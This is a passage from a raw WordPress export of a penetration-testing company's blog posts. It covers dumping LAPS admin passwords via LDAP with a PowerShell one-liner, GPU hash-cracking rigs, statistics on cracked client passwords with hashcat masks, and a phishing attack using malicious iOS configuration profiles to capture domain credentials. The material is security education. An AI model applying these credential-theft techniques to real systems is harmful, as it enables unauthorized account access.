I'm sure that there's a couple that I missed here, but feel free to add them in the comments. [post_title] => 10 Places to Stick Your UNC Path [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 10-places-to-stick-your-unc-path [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:38 [post_modified_gmt] => 2021-06-08 21:46:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=4496 [menu_order] => 311 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [28] => WP_Post Object ( [ID] => 4020 [post_author] => 10 [post_date] => 2015-05-05 07:00:58 [post_date_gmt] => 2015-05-05 07:00:58 [post_content] =>

Intro

Managing credentials for local administrator accounts is hard to do. From setting strong passwords, to setting unique passwords across multiple machines, we rarely see it done correctly. On the majority of our pen tests we see that most of the domain computers are configured with the same local admin credentials. This can be really handy as an attacker, as it provides us lateral access to systems across the network.

One of the reported fixes (from Microsoft) is to store the local admin passwords in LDAP as a confidential attribute of the computer account. This can be automated using Microsoft tools and strong local passwords can be enforced (and automatically changed). In theory, this is a nice idea. But in practice it results in the cleartext storage of passwords (not good). Previous attempts at local administrator credential management (from Microsoft) resulted in local administrator credentials being exposed to all users on the domain (through group policy preferences). The GPP cpassword storage passwords issue was fixed (5/13/14) and we’re not seeing it as frequently any more.

LAPS

Img E C A A

LAPS is Microsoft’s tool to store local admin passwords in LDAP. As long as everything is configured correctly, it should be fine to use. But if you don’t set the permissions correctly on the LDAP attributes, you could be exposing the local admin credentials to users on the domain. LAPS uses two LDAP attributes to store the local administrator credentials, ms-MCS-AdmPwd (stores the password) and ms-MCS-AdmPwdExpirationTime (stores when it expires). The Microsoft recommendations says to remove the extended rights to the attributes from specific users and groups. This is a good thing to do, but it can be a pain to get set up properly. Long story short, if you’re using LAPS, someone on the domain should be able to read those local admin credentials in cleartext. This will not always be a privilege escalation route, but it could be handy data to have when you're pivoting to sensitive systems after you’ve escalated. In our demo domain, our LAPS deployment defaulted to allowing all domain users to have read access to the password. We also could have screwed up the install instructions.

I put together a quick PowerShell script to pull the LAPS specific LDAP attributes for all of the computers joined to the domain. I used Scott Sutherland’s Get-ExploitableSystems script (now included in PowerView) as the template. You can find it on my GitHub page.

Script Usage and Output

Here’s the output using an account that does not have rights to read the credentials (but proves they exist):

PS C:> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential DEMOkarl | Format-Table -AutoSize

Hostname                    Stored Readable Password Expiration
--------                    ------ -------- -------- ----------
WIN-M8V16OTGIIN.test.domain   0      0               NA
WIN-M8V16OTGIIN.test.domain   0      0               NA
ASSESS-WIN7-TEST.test.domain  1      0               6/3/2015 7:09:28 PM

Here’s the same command being run with an account with read access to the password:

PS C:> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential DEMOadministrator | Format-Table -AutoSize

Hostname                    Stored Readable Password       Expiration
--------                    ------ -------- --------       ----------
WIN-M8V16OTGIIN.test.domain   0      0                     NA
WIN-M8V16OTGIIN.test.domain   0      0                     NA
ASSESS-WIN7-TEST.test.domain  1      1      $sl+xbZz2&qtDr 6/3/2015 7:09:28 PM

The usage is pretty simple and everything is table friendly, so it’s easy to export to a CSV.

Special thanks to Scott Sutherland for letting me use his Get-ExploitableSystems script as the bones for the script. The LDAP query functions came from Carlos Perez's PoshSec-Mod (and also adapted from Scott's script). And the overall idea to port this over to a Powerview-friendly function came from a conversation with @_wald0 on Twitter.

Links

LDAP is a great place to mine for sensitive data. Here’s a couple of good examples:

Bonus Material

If you happen to have the AdmPwd.PS PowerShell module installed (as part of LAPS), you can use the following one-liner to pull all the local admin credentials for your current domain (assuming you have the rights):

foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
[post_title] => Running LAPS Around Cleartext Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => running-laps-around-cleartext-passwords [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:18 [post_modified_gmt] => 2021-06-08 21:46:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=4020 [menu_order] => 317 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [29] => WP_Post Object ( [ID] => 3585 [post_author] => 10 [post_date] => 2015-04-27 07:00:32 [post_date_gmt] => 2015-04-27 07:00:32 [post_content] =>

A little over two years ago, we built our first GPU cracking box. At the time, there was pretty limited information on what people were doing to build a decent cracking box, especially if you were trying to do so without breaking the bank. As with any piece of technology, things go out of date, things get upgraded, and documentation needs to get updated. Since it’s now two years since I wrote about our first system , I figured it was time to write an update to show what we’re actually using for cracking hardware now.

The Case

We currently have two cracking systems, Development and Production. Our development system is seated in a really nice (and relatively cheap) case that we picked up from MiningRigs.net. The big downside of this case is that we can’t immediately buy another one. The group making the case had recently switched to a Kickstarter model (we were one of the only backers), but they secured outside funding for the cases and are now building more. As soon as they have them ready, we're planning on picking up another one.

Dan Case

Our production system is currently housed in a much lower-tech case… Three Milkcrates. As you can see, we’ve graduated from server shelving to an arguably crazier option. After seeing a number of Bitcoin miners using the milkcrate method for cases, we moved our cards over. This has actually worked quite well. The only issue that we’ve run into (outside of noise) is high temperatures on some of the cards. We’ve been able to keep the heat issues away by manually setting the fan speeds on all of the cards to 100%.

Cratecase E

*Update (5/19/15): We actually got another rack-mount case for our production system. Goodbye milk crates.

B E C E C Dde Dae E Da C E

The Motherboard

One of the big changes that we were happy to see over the last two years was the move by hardware manufacturers to embrace Bitcoin miners (even though most have moved off of GPU mining). ASRock now makes a Bitcoin specific motherboard (H81 PRO BTC) that is specifically geared towards running multiple GPUs. With six PCI-E slots, it’s a very inexpensive ($65) choice for creating a cracking box. Five of the slots are PCI-E 1x slots (and mounted pretty closely together), so you will need to use risers to attach your cards.

The Risers/Extenders

Another Bitcoin focused product that we’ve been using are the USB 3.0 PCI-E risers  (or extenders). These little devices allow you to put a PCI-E 16x card into a PCI-E 1x slot. The card then attaches to the motherboard with a USB cable. Basically, these extend your PCI-E slots using USB cables. These are much cleaner and more reliable than the ribbon riser cables we started using.

The Cards

I will say that I really like the newer cards (R9 290) that we are currently running. They have decent cracking rates and I really haven’t had too many issues with them so far. The biggest issue has been heat. This can mostly be mitigated by having decent airflow around the case and setting the fan speeds on your cards to the max. The fan speeds can be set using the aticonfig command  (pre-R series cards) or od6config for newer cards. One of the biggest pains that I’ve dealt with on our systems is getting all the fans set correctly for all the cards, specifically when you have a mix of older and newer cards. For simplicity’s sake, I would recommend going with one card model for your cracking box. The newer cards are nice, but if you can find someone trying to offload some older 7950s, I would recommend buying those.

The Power Supplies

Our recommendations on power supplies haven’t changed. Only running one to three cards? You will probably be fine with one power supply. Going any higher and you will want two. Shoot for higher wattage power supplies (800+) and get a Y-Splitter.

CPU/RAM/Hard Drive

All of these can be generic. It doesn’t hurt to max these out, but they don't really impact cracking performance. If you’re going to throw money around, throw it at your cards.

Here's a pretty general parts and pricing list if you want to build your own.

ComponentModelEst. Price
Case6 GPU Rackmount Server Case$495
MotherboardASRock Motherboard H81 PRO BTC$64
Risers (6)PCI-E 1X To 16X USB 3.0 Riser Card$24
GPUs (6)XFX Black Edition R9 290$1,884
Power Supply (2)CORSAIR AX1200i 1200W$618
Power-SplitterDual PSU Adapter Cable$9
RAM8 GB - Any Brand$50
CPUIntel Celeron G1820 Dual-Core (2.7GHz)$45
HDD1 TB - Any Brand$50
Total $3,239

If you have any questions or better parts recommendations, feel free to leave a comment below.

[post_title] => GPU Cracking: Rebuilding the Box [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-rebuilding-box [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:09 [post_modified_gmt] => 2021-06-08 21:46:09 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=3585 [menu_order] => 319 [post_type] => post [post_mime_type] => [comment_count] => 16 [filter] => raw ) [30] => WP_Post Object ( [ID] => 2855 [post_author] => 10 [post_date] => 2015-03-02 07:00:36 [post_date_gmt] => 2015-03-02 07:00:36 [post_content] => It’s been a big year for password cracking at NetSPI. We’ve spent a lot of time refining our dictionaries and processes to more efficiently crack passwords. This has been a huge help during our pentests, as the cracked passwords have been the starting point for gaining access to systems and applications. While this blog focuses on the Windows domain hashes (LM/NTLM) that we’ve cracked this year, these statistics also translate into the other hashes that we run into (MD5, NetNTLM, etc.) during penetration tests. During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a summary of the hashes that we attempted to crack in 2014. Please keep in mind that this is not an all-encompassing sample. We do not collect domain hashes during every single penetration test, as some clients do not want us to. Additionally, these are Windows domain credentials. These are not web site or application passwords, which frequently have weaker password complexity requirements. This year, we collected 90,977 domain hashes. On average, we still see about ten percent of domain hashes that are stored with their LM hashes. This is due to accounts that do not change their passwords after the NTLM-only group policy gets applied. The LM hashes definitely helped our password cracking numbers, but they were not crucial to the cracking success. Of the collected hashes, 27,785 were duplicates, leaving 63,192 unique hashes. Of the total 90,977 hashes, we were able to crack 77,802 (85.52%). In terms of cracking effort, we typically put about a day's worth of effort into the hashes when we initially get them. I did an additional five days of cracking time on these, once we hit the end of the year. Piegraph Here’s nine of the top passwords that we used for guessing during online brute-force attacks:
  • Password1 - 1,446
  • Spring2014 - 219
  • Spring14 - 135
  • Summer2014 - 474
  • Summer14 - 221
  • Fall2014 - 150
  • Autumn14 - 15*
  • Winter2014 - 87
  • Winter14 - 63
*Fall14 is too short for most complexity requirements Combined, these account for 3.6% of all accounts. These are typically used for password guessing attacks, as they meet password complexity requirements and they’re easy to remember. This may not seem like a large number, but once we have access to one account, lots of options open up for escalation. Other notable reused passwords:
  • Changem3 - 820
  • Work1234 - 283
  • Password2 - 142
  • Company Name followed by a one (Netspi1)
Cracked Password Length Breakdown: As you can see below, the cracked passwords peak at the eight character length. This is a pretty common requirement for minimum password length, so it’s not a big surprise that this is the most common length cracked. It should also be noted that since we’re able to get through the entire eight character key space in about two days. This means any password that was eight characters or less was cracked within two days. Bargraph Some interesting finds:
  • Most Common Password (3,003 instances): [REDACTED] (This one was very specific to a client)
  • Longest Password: UniversityofNorthwestern1 (25 characters)
  • Most Common Length (33,654 instances - 43.2%): 8 characters
  • Instances of “password” (full word, case-insensitive): 3,266 (4.4%)
  • Blank passwords: 362
  • Ends with a “1”: 10,025 (12.9%)
  • Ends with “14”: 4,617 (6%)
  • Ends with “2014”: 2645 (3.4%)
  • Passwords containing profanity (“7 dirty words” - full words, no variants): 48
  • Top mask pattern: ?u?l?l?l?l?l?d?d (3,439 instances - 4.4%)
    • Matches Spring14
    • 8 Characters
    • Upper, lower, and number
  • The top 10 mask patterns account for 37% of the cracked passwords
    • The top 10 masks took 25 minutes for us to run on our GPU cracking system
  • One of our base dictionaries with the d3ad0ne rule cracked 52.7% of the hashes in 56 seconds
Note: I used Pipal to help generate some of these stats. I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this year. You can download them here Additionally, I put together one for every quarter. These can be found in the previous quarter blogs: For more information on how we built our GPU-enhanced password cracking box, check out our slides For a general outline of our password cracking methodology check out this post [post_title] => NetSPI's Top Cracked Passwords for 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspis-top-cracked-passwords-for-2014 [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:45:45 [post_modified_gmt] => 2021-06-08 21:45:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=2855 [menu_order] => 327 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [31] => WP_Post Object ( [ID] => 1922 [post_author] => 10 [post_date] => 2014-12-15 07:00:13 [post_date_gmt] => 2014-12-15 07:00:13 [post_content] => During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the third quarter of 2014 (and so far for this year). The plan is continue doing this again at the end of the year to see how we did overall for the year (three quarters down, one to go). Please keep in mind that this is not an all-encompassing sample. We do not collect domain hashes during every single penetration test, as some clients do not want us to. The sample for this quarter included three sets of domain hashes that added up to 26,692 hashes. Two of the three sets had some LM hashes stored along with the NTLM hashes, but none of the LM stored passwords were that complicated. Just like last quarter, it wasn’t a huge advantage. Of the hashes, 11,776 were duplicates, leaving 14,916 unique hashes. Of the 26,692 hashes, we were able to crack 21,955 (82.25%). Crackingstats Cracked Password Length Breakdown: Crackingstats As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked. It’s also been the peak every quarter this year. It should also be noted that since we’re able to get through the entire eight character keyspace in about two and a half days, which may be influencing the peak. Some interesting finds:
  • Most Common Password (1120 instances): A Client Specific Default Account Password
  • Longest Password: jesusitrustinyou@123 (20 characters)
  • Most Common Length (8,656 instances): 8 characters
  • Instances of “Summer2014”: 394
  • Instances of “Spring123”: 300
  • Instances of “Summer123”: 262
  • Instances of “Summer14”: 163
  • Instances of “password” (full word, case-insensitive): 251
  • Blank passwords: 348
  • Top mask pattern: ?u?l?l?l?d?d?d?d?s (1,415 instances)
So far this year, we’ve collected 60,638 hashes to crack. Of those, we’ve been able to crack 51,393 (84.75%). Q Pie Here’s the length breakdown for the year, so far. Q Bar Some more interesting finds:
  • Most Common Password – (that we can print here): Password1 (1410 instances)
  • Longest Passwords: Six different passwords were 20 characters
  • Most Common Length (22,994 instances): 8 characters
  • Instances of “password” (full word, case-insensitive): 2,926
  • Instances of “SEASON2014”: 1,404
    • -SEASON = spring, summer, fall, winter (case-insensitive)
  • Top Mask Pattern: ?u?l?l?l?l?l?d?d (3,068 instances)
I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this quarter. Additionally, I put together one for everything that we’ve cracked for the first half of the year. You can download them here – Q3 Hcmask File - Q1,Q2,Q3 Hcmask File. I plan on wrapping this up next quarter, so check back to see how this mask files have changed and to see how well we’ve done across the year. For more information on how we built our GPU-enhanced password cracking box, check out our slides. For a general outline of our password cracking methodology check out this post. [post_title] => Cracking Stats for Q3 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-stats-q3-2014 [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:43:19 [post_modified_gmt] => 2021-06-08 21:43:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1922 [menu_order] => 335 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [32] => WP_Post Object ( [ID] => 1106 [post_author] => 10 [post_date] => 2014-10-06 07:00:38 [post_date_gmt] => 2014-10-06 07:00:38 [post_content] =>

Lately, Eric Gruber and I have been speaking about the cracking box that we built at NetSPI. Every time we present, the same question always comes up.

“What about Rainbow Tables?”

Our standard response has been that we don’t need them anymore. I honestly haven’t needed (or heavily used) them for a while now, as our cracking box has been able to crack the majority of the hashes that we throw at it. This got me thinking about what the actual trade offs are for using our GPUs to crack LM hashes versus using the more traditional method of Rainbow Tables.

Windows Hashes

The LAN Manager (or LM) hashing algorithm is the legacy way of storing password hashes in Windows. The replacement (NTLM) has been around for quite a while, but we still see the LM hashing algorithm being used on both local and domain password hashes.

The LM hash format breaks passwords into two parts. Each part can be up to seven characters long. If the password is seven characters or less, the second part is just a blank LM hash. All of the alphabetical characters are converted to upper case, as the LM hash standard is case insensitive. Case sensitivity is stored in the NTLM hashes.

In the example below, the hash for the password “QBMzftvX” is broken into two parts (QBMZFTV and X). You will also see that all of the cleartext characters of these LM hashes are upper-cased.

Hashexample

For the purpose of this blog, I’ll only be covering the trade offs of using Rainbow Tables for LM hashes. There are NTLM Rainbow Tables, and they can be used with great success, but I won’t be covering the GPU/Rainbow Tables comparison for NTLM in this post.

Rainbow Tables

Traditionally, LM hashes have been attacked with Rainbow Tables. It’s easy to create large tables of these password/hash combinations for every possible LM hash, as you only have to create them for one to seven-character combinations. Once you’ve looked up the hash halves in the tables, you toggle cases on the letters to brute force the password for the case-sensitive NTLM hash. This method works well, but disk reads can be slow and sometimes your computer is busy doing other things, so adding in LM table lookups may slow the rest of your system down. Some great advances have been made by multi-threading the table lookups. This ended up being one of the pain points in writing this blog, as I didn’t have the correct multi-threaded Rainbow Table format to use with rcrack_mt. Additionally, the table lookups were helped by the fact that I was using an SSD to house the Rainbow Tables. I included stats for rcrack_mt table look ups for comparison in the table at the end.

There are two major tradeoffs with using Rainbow Tables. The primary one being disk space. The Rainbow Tables themselves can take up a fair amount of space. I know that disk space is relatively cheap now, but five years ago this was a much bigger deal. The second tradeoff is the time it takes to initially generate the tables. If you are not getting the tables off of the internet (also time consuming), you might be taking days (possibly months) to generate the tables.

GPU Cracking

I really can’t give enough credit to the people working on the Hashcat projects. They do a great job with the software and we use it every day. We use oclHashcat to do GPU brute force attacks on the one to seven character LM hashes. Once cracked, the halves are reassembled and a toggle case attack is run with hashcat (CPU version). Using GPUs to do the brute forcing allows us to save some disk space that would typically be used by the LM tables, and it allows us to offload the cracking to our centralized system. Since we’ve scripted it all, I just pull the LM and NTLM hashes into our script and grab a cup of coffee. But does it save us any time?

Hybrid GPU Rainbow Tables

There are programs (RainbowCrack) that allow for a hybrid attack that uses GPU acceleration to do the Rainbow table lookups. I’ve heard that these programs work well, but RainbowCrack only supports the GPU acceleration through Windows, so that means we won’t be using it on our GPU cracking rig.

The Breakdown

For this test, I generated a set of 100 LM/NTLM hashes from randomly generated passwords of various lengths (a mix of 6-14 character lengths). Cracking with Rainbow Tables was done from my Windows laptop (2.70GHz Intel i7, 16 GB RAM, SSD). GPU cracking was done on our GPU cracking box (5 GPUs).

MethodCrackedTime
Rainbow Tables (OphCrack*)99/10024 Minutes 5 Seconds
oclHashcat/CPU Hashcat100/10018 Minutes 56 Seconds
Rcracki (multithreaded**)100/1005 Minutes 40 Seconds

*OphCrack 3.6.0 run with the XP Special Tables

**Rcracki_mt running with 24 threads

So after all of this effort, I can’t totally justify saying that using oclHashcat/Hashcat is faster for cracking LM hashes, but given our setup, it’s still pretty fast. That being said, if you don’t have your own GPU cracking rig, you will definitely be better off using Rainbow tables, especially if you multi-thread it on a solid state drive.

[post_title] => LM Hash Cracking – Rainbow Tables vs GPU Brute Force [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => lm-hash-cracking-rainbow-tables-vs-gpu-brute-force [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:43 [post_modified_gmt] => 2021-06-08 21:48:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1106 [menu_order] => 341 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [33] => WP_Post Object ( [ID] => 1108 [post_author] => 10 [post_date] => 2014-08-18 07:00:48 [post_date_gmt] => 2014-08-18 07:00:48 [post_content] => During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the second quarter of 2014 (and so far for this year). The plan is to continue doing this each quarter for the rest of the year to see how we did overall for the year. Please keep in mind that this is not an all encompassing sample. We do not collect domain hashes during every single penetration test, as some clients do not want us to.

Q Hash Cracking Pie Chart

The sample for this quarter included three sets of domain hashes that added up to 23,898 hashes. All three sets had some LM hashes stored along with the NTLM hashes, but none of the LM stored passwords were that complicated, so it wasn’t a huge advantage. Of the hashes, 8,277 were duplicates, leaving 15,621 unique hashes. Of the 23,898 hashes, we were able to crack 21,465 (89.82%). Cracked Password Length Breakdown:

Q Hash Cracking Bar Chart

As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked. Some interesting finds:
  • Most Common Password (820 instances): Changem3
  • Longest Password: 20 characters
  • Most Common Length (10,897 instances): 8 characters
  • Instances of “password” (case-insensitive): 1,541
  • Instances of “spring2014” (case-insensitive): 111
  • Instances of “spring14” (case-insensitive): 93
  • Instances of “summer2014” (case-insensitive): 84
  • Instances of “summer14” (case-insensitive): 59
So far this year, we’ve collected 33,950 hashes to crack. Of those, we’ve been able to crack 29,077 (85.65%). Some more interesting finds:
  • Most Common Password (1274 instances): Password1
  • Longest Passwords: 20 characters – Two passwords based off of the name of the business group using them
  • Most Common Length (14,339 instances): 8 characters
  • Instances of “password” (case-insensitive): 2,675
  • Instances of “winter2014” (case-insensitive): 23
  • Instances of “winter14” (case-insensitive): 18
  • Instances of “spring2014” (case-insensitive): 102
  • Instances of “spring14” (case-insensitive): 91
I put together an hcmask file (to use with oclHashcat ) of our top forty password patterns that were identified for this quarter. Additionally, I put together one for everything that we’ve cracked for the first half of the year. You can download the files here: Top40_Q2 and Top40 Q1 and Q2. I plan on keeping up with this each quarter, so check back in next quarter to see how this mask files have changed and to see how well we’ve done across the three quarters. For more information on how we built our GPU-enhanced password cracking box, check out our slides For a general outline of our password cracking methodology check out this post [post_title] => Cracking Stats for Q2 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-stats-for-q2-2014 [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:43 [post_modified_gmt] => 2021-06-08 21:48:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1108 [menu_order] => 343 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [34] => WP_Post Object ( [ID] => 1116 [post_author] => 10 [post_date] => 2014-06-09 07:00:21 [post_date_gmt] => 2014-06-09 07:00:21 [post_content] => How much can you trust your devices? In this blog post, we will cover a practical attack that utilizes the iPhone Configuration Utility, a malicious Mobile Device Management (MDM) server, and a little bit of social engineering to get you data from iOS devices, HTTP and HTTPS web traffic, and possibly domain credentials.

The Scenario:

To start this off, we will be sending out a .mobileconfig file to iOS devices at the HACKME company. This .mobileconfig file is created with the iPhone Configuration Utility (shown below) and will set up iOS devices to use a specific proxy host when connected to a specific Wi-Fi network. This proxy will be used later to capture HTTP and HTTPS traffic. Additionally, we will configure trusted certificates and an MDM server to use for (malicious) device management. Our example will focus on getting users to install this .mobileconfig with a phishing email. The phishing email will come from support@hackme.com and will have the .mobileconfig file attached. The email will encourage the iPhone owners to install the .mobileconfig to maintain compliance with company policy. Once the target is phished and the profile is installed on their device, we will want their iOS device in range of our wireless access point. This could easily be done with a high powered Wi-Fi access point in the parking lot. If we want even closer access to our targets, we could send someone into the client building with a battery powered 3G/4G AP in a bag and have them run the attack from inside the building.

The Setup:

The first step in this attack is to set up our malicious .mobileconfig profile to send out with the phishing email. This .mobileconfig will have a default Wi-Fi network configured along with a proxy to use when connected to the Wi-Fi. For this demonstration, we will be showing screenshots from the Windows version of the iPhone Configuration Utility. Wi-Fi Network Setup (with proxy settings)

Mdm

If we are going to intercept HTTPS traffic, we are going to need a trusted root CA on the iOS device. This too can be done with the iPhone Configuration Utility. In this attack, we will be using the PortSwigger CA from the Burp proxy.

Mdm

This config will then be exported to a .mobileconfig file, and we will send it along with the phishing email.

Mdm

The only downside to this is the signing of the profile. As of now, it can be a pain to get these properly signed using Windows. The Apple device management utility allows you to specify certs to use for signing, so I would say use the Apple tool for exporting your profiles. Overall this won't too big of a deal, if you're assuming that people will not care about the "Not Verified" warning on the profile.

Mdm

Once the user has the profile installed on their iOS device, we need to get in Wi-Fi range of their device. For simplicity's sake, let's say that we just tailgated into the office and set up shop in an empty office or conference room. A capture device, such as a RaspberryPi or laptop, and wireless AP (with 4G internet access) will be with us and running off of battery power. The capture device could also easily sit in a bag (purse, backpack, etc.) in an unlocked file cabinet. For our safety, we will lock the cabinet and take the key with us. We could then leave the devices for later retrieval, or have the capture device phone home for us to access the proxy logs remotely. At this point, there should be some decent data coming through on the Wi-Fi traffic, but our main goal for this demo is to capture the exchange ActiveSync request. It looks like this:

Mdm

You'll see the Authorization token in the request header. This is actually the base64 encoded domain credentials (HACKMEhackmetest:P@ssword123!) for the iPhone user. Now that we have domain credentials, the rest of the escalation just got a lot easier. We also set up a web clip to deploy to the iOS device. This fake app will be handy in the event that we're unable to get the ActiveSync credentials. The app will look like a branded HACKME company application that opens a web page in Safari containing a login prompt. The malicious site will store any entered credentials and fail on attempts to login. So even if we're not on the same Wi-Fi network, we might be able to get credentials.

Mdm

One additional item to think about is that these profiles do not have to be deployed via email. If an attacker has access to an unlocked device and the passcode, they may be able to install the profile to the iOS device via USB. This attack can be particularly applicable to kiosk iOS devices that allow physical access to their lightning/30-pin connectors. Finally, all of this can be continually manipulated if you set up an MDM server for the device to connect to, but we'll save that for another blog.

Conclusion

Don't leave device management up to your users. If you are using iOS devices in your environment, lock the devices down and prevent users from installing their own configurations. More importantly, go and configure your company devices before an attacker does it for you. [post_title] => Malicious MobileConfigs [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => malicious-mobile-configs [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:52 [post_modified_gmt] => 2021-06-08 21:48:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1116 [menu_order] => 351 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [35] => WP_Post Object ( [ID] => 1117 [post_author] => 10 [post_date] => 2014-06-02 07:00:50 [post_date_gmt] => 2014-06-02 07:00:50 [post_content] => During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the first quarter of 2014. The plan is to do this again each quarter for the rest of the year to see how we did overall for the year. There was a relatively small sample for this quarter: just three sets of domain hashes that added up to 10,050 hashes. We are frequently in environments with twice as many users (20k and up), so this is a pretty limited set. One of these sets had LM hashes stored along with the NTLM hashes, making our cracking efforts a little bit easier. Of these hashes, 2,583 were duplicates, leaving 7,184 unique hashes. Of the 10,050 hashes, we were able to crack 7,510 (74.73%).

Q1 Cracking Hashes

Cracked Password Length Breakdown:

Cracked Password

As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked. Some more interesting finds:
  • Most Common Password (606 instances): Password1
  • Longest Password: 19 characters - visualmerchandising
  • Most Common Length (3,356 instances): 8 characters
  • Instances of “password” (case-insensitive): 122
  • Instances of [ClientName] (case-insensitive, no modifications, and redacted for obvious reasons): 284
  • Instances of “winter2014” (case-insensitive): 3
  • Instances of “winter14” (case-insensitive): 4
  • Instances of “spring2014” (case-insensitive): 5
  • Instances of “spring14” (case-insensitive): 8
In terms of effort that we put in on each of these hashes, we ran our typical twenty-four hour process on each of the hash files during each of the pentests. Since we keep a dictionary of all of the previously cracked hashes, this made it easier to re-run some of the cracking efforts with the already cracked hashes as a start. We added in some additional cracking time to really go after these hashes, but that was mostly brute force effort. I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this quarter. You can download it here - Q1Masks. I plan on keeping up with this each quarter, so check back in July to see how this mask file has changed by second quarter and how well we've done over the first half of the year. For more information on how we built our GPU-enhanced password cracking box, check out this presentation we recently did at Secure360: GPU Cracking - On The Cheap For a general outline of our password cracking methodology check out this post: GPU Password Cracking – Building a Better Methodology [post_title] => Cracking Stats for Q1 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-stats-for-q1-2014 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:38 [post_modified_gmt] => 2021-04-13 00:05:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1117 [menu_order] => 352 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [36] => WP_Post Object ( [ID] => 1124 [post_author] => 10 [post_date] => 2014-03-15 07:00:38 [post_date_gmt] => 2014-03-15 07:00:38 [post_content] => In an attempt to speed up our password cracking process, we have run a number of tests to better match our guesses with the passwords that are being used by our clients. This is by no means a definitive cracking methodology, as it will probably change next month, but here's a look at what worked for us on a recent cracking test. For a little background, these hashes were pulled from a domain controller in the last six months. The DC still had some hashes stored in the older LanManager (LM) format in addition to NTLM. The password cracking process is also helped by using any cleartext passwords, recovered during the penetration test, as a dictionary. For this sample, there were:
  • 1000 total hashes (159 LM/NTLM, 841 NTLM-Only)
  • 828 unique hashes
  • 172 accounts with duplicate* passwords (*shared with one or more accounts)
Since LM hashes are weaker, we cracked those first. Initial attacks cracked all of the LM/NTLM hashes, giving us a nice head start (130/828 unique hashes or 15.7% cracked) and a good list to feed back into our other attacks.

The General Methodology:

1. Use the dictionary and rules (Three minutes*) - Remaining Unique Hashes 698

Our dictionary file will typically catch the simple passwords. Our dictionary includes previously cracked passwords and most dictionary-word-based passwords will be in here. Add in a couple of simple rules (d3ad0ne, passwordspro, etc.) and this will catch a few of the "smarter" users with passwords like "1qaz2wsx%". As for the starting rules, we're currently using a mix of the default oclHashcat rules and some of the rules from KoreLogic's 2010 rule list - http://contest-2010.korelogic.com/rules-hashcat.html For our sample set of data, the dictionary attack (with a couple of rules) caught 372 of the remaining 698 hashes (53%).

2. Start with the masking attacks (Fifteen minutes*) - Remaining Unique Hashes 326

